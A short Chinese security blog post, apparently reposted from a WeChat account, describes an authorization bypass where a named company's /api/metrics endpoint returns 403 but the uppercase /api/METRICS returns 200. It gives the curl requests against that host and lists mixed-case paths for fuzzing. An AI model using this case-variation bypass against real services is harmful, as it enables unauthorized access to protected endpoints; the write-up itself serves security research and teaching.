权限绕过骚思路
正文
越朴实的有时候越会被忽略
正常情况下,API 路由应该是大小写严格敏感或统一处理,比如 /metrics 和 /METRICS 应该是一样的处理方式。
但这个系统中:
/metrics 返回 403,说明接口存在权限校验。
/METRICS 却返回 200,说明系统中存在一个路径大小写未统一处理的 bug,可能是文件路径、路由定义、Nginx 配置或框架处理时的大小写绕过,从而跳过了访问控制逻辑。
正常情况下:
curl -X GET "https://injob.indriver.com/api/metrics" -H "Content-Type: application/json"
# HTTP 403 Forbidden
受到攻击之后:
curl -X GET "https://injob.indriver.com/api/METRICS" -H "Content-Type: application/json"
# HTTP 200 OK
模糊测试的时候可能还有如下的路径:
/api/Metrics
/api/MetriCS
/api/MeTRiCS
这里有个注意点: 这种绕过一定要是在命令行上面完成
原文始发于微信公众号(迪哥讲事):权限绕过骚思路
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论